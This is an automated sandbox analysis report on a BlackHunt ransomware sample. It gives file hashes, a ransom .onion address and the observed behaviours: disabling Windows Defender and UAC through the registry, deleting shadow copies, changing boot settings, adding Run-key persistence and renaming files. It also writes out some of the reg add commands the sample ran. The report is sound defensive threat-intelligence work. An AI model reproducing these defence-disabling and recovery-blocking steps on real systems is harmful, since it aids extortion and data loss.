Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
178s -
max time network
201s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:16
Static task
static1
Behavioral task
behavioral1
Sample
4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe
Resource
win10v2004-20231215-en
General
-
Target
4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe
-
Size
707KB
-
MD5
a18dfbb59960221ef995a4f8c941fafa
-
SHA1
52cf4c1949403c7a2265cca7fb7bb5d59d9b22b3
-
SHA256
4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be
-
SHA512
de522ad7c978b3f797baf4d3fc906657f6302a2885aedc7c9b188d1c7181d84a938ba51fa67d7d9cf48d16b3787b5f56fbe3de638dfea68de1a1d27eabc7847a
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza188Uvnh:6uaTmkZJ+naie5OTamgEoKxLWvqh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4304 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1468 bcdedit.exe 3276 bcdedit.exe -
Renames multiple (576) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3664 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\S: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\L: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\E: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\T: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\U: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\W: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\O: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\V: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\H: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\K: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\X: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\Q: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\A: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\J: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\B: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\Z: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\I: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\G: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\N: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\Y: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened (read-only) \??\M: 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\kn\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaSansDemiBold.ttf 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management-agent.jar 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\LINEAR_RGB.pf 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunec.jar 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_ReadMe.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\RevokeSkip.mp4 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jsse.jar 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xerces.md 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\calendars.properties 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\Welcome.html 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fontconfig.properties.src 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyDrop32x32.gif 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#BlackHunt_ReadMe.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\GRAY.pf 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\jvm.lib 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\bcel.md 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\Java\jre-1.8\bin\dtplugin\#BlackHunt_ReadMe.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\Java\jre-1.8\legal\javafx\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\orb.idl 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_ReadMe.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\webkit.md 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\#BlackHunt_ReadMe.hta 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\RegisterCompare.mpg 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\COPYRIGHT 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\es\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#BlackHunt_ReadMe.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\local_policy.jar 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\santuario.md 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\SendRead.asp 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#BlackHunt_ReadMe.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\javafx.properties 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#BlackHunt_Private.key 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\public_suffix.md 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_MoveDrop32x32.gif 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\jopt-simple.md 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 440 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1336 vssadmin.exe 2500 vssadmin.exe 3500 vssadmin.exe 4456 vssadmin.exe 3244 vssadmin.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe Token: SeRestorePrivilege 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe Token: SeBackupPrivilege 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe Token: SeTakeOwnershipPrivilege 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe Token: SeAuditPrivilege 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe Token: SeSecurityPrivilege 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe Token: SeIncBasePriorityPrivilege 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe Token: SeBackupPrivilege 880 vssvc.exe Token: SeRestorePrivilege 880 vssvc.exe Token: SeAuditPrivilege 880 vssvc.exe Token: SeBackupPrivilege 5524 wbengine.exe Token: SeRestorePrivilege 5524 wbengine.exe Token: SeSecurityPrivilege 5524 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4188 wrote to memory of 3536 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 92 PID 4188 wrote to memory of 3536 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 92 PID 4188 wrote to memory of 3292 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 93 PID 4188 wrote to memory of 3292 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 93 PID 4188 wrote to memory of 4260 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 96 PID 4188 wrote to memory of 4260 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 96 PID 4188 wrote to memory of 1716 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 97 PID 4188 wrote to memory of 1716 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 97 PID 4188 wrote to memory of 4036 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 98 PID 4188 wrote to memory of 4036 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 98 PID 3536 wrote to memory of 1156 3536 cmd.exe 102 PID 3536 wrote to memory of 1156 3536 cmd.exe 102 PID 4036 wrote to memory of 1000 4036 cmd.exe 106 PID 4036 wrote to memory of 1000 4036 cmd.exe 106 PID 3292 wrote to memory of 2828 3292 cmd.exe 105 PID 3292 wrote to memory of 2828 3292 cmd.exe 105 PID 1716 wrote to memory of 2872 1716 cmd.exe 103 PID 1716 wrote to memory of 2872 1716 cmd.exe 103 PID 4260 wrote to memory of 3020 4260 cmd.exe 104 PID 4260 wrote to memory of 3020 4260 cmd.exe 104 PID 4188 wrote to memory of 1952 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 107 PID 4188 wrote to memory of 1952 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 107 PID 4188 wrote to memory of 3700 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 109 PID 4188 wrote to memory of 3700 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 109 PID 4188 wrote to memory of 2484 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 111 PID 4188 wrote to memory of 2484 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 111 PID 4188 wrote to memory of 2284 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 114 PID 4188 wrote to memory of 2284 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 114 PID 4188 wrote to memory of 4400 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 116 PID 4188 wrote to memory of 4400 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 116 PID 4188 wrote to memory of 224 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 118 PID 4188 wrote to memory of 224 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 118 PID 4188 wrote to memory of 4968 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 121 PID 4188 wrote to memory of 4968 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 121 PID 3700 wrote to memory of 3380 3700 cmd.exe 120 PID 3700 wrote to memory of 3380 3700 cmd.exe 120 PID 4188 wrote to memory of 2396 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 126 PID 4188 wrote to memory of 2396 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 126 PID 1952 wrote to memory of 1200 1952 cmd.exe 123 PID 1952 wrote to memory of 1200 1952 cmd.exe 123 PID 2484 wrote to memory of 3156 2484 cmd.exe 124 PID 2484 wrote to memory of 3156 2484 cmd.exe 124 PID 4188 wrote to memory of 2996 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 127 PID 4188 wrote to memory of 2996 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 127 PID 4400 wrote to memory of 1760 4400 cmd.exe 130 PID 4400 wrote to memory of 1760 4400 cmd.exe 130 PID 2284 wrote to memory of 4392 2284 cmd.exe 129 PID 2284 wrote to memory of 4392 2284 cmd.exe 129 PID 224 wrote to memory of 1508 224 cmd.exe 131 PID 224 wrote to memory of 1508 224 cmd.exe 131 PID 4968 wrote to memory of 2016 4968 cmd.exe 132 PID 4968 wrote to memory of 2016 4968 cmd.exe 132 PID 4188 wrote to memory of 1172 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 133 PID 4188 wrote to memory of 1172 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 133 PID 2396 wrote to memory of 2908 2396 cmd.exe 135 PID 2396 wrote to memory of 2908 2396 cmd.exe 135 PID 2996 wrote to memory of 4444 2996 cmd.exe 138 PID 2996 wrote to memory of 4444 2996 cmd.exe 138 PID 4188 wrote to memory of 1072 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 136 PID 4188 wrote to memory of 1072 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 136 PID 4188 wrote to memory of 1752 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 142 PID 4188 wrote to memory of 1752 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 142 PID 4188 wrote to memory of 4256 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 139 PID 4188 wrote to memory of 4256 4188 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe 139 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe"C:\Users\Admin\AppData\Local\Temp\4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4188 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3020
-
-
-
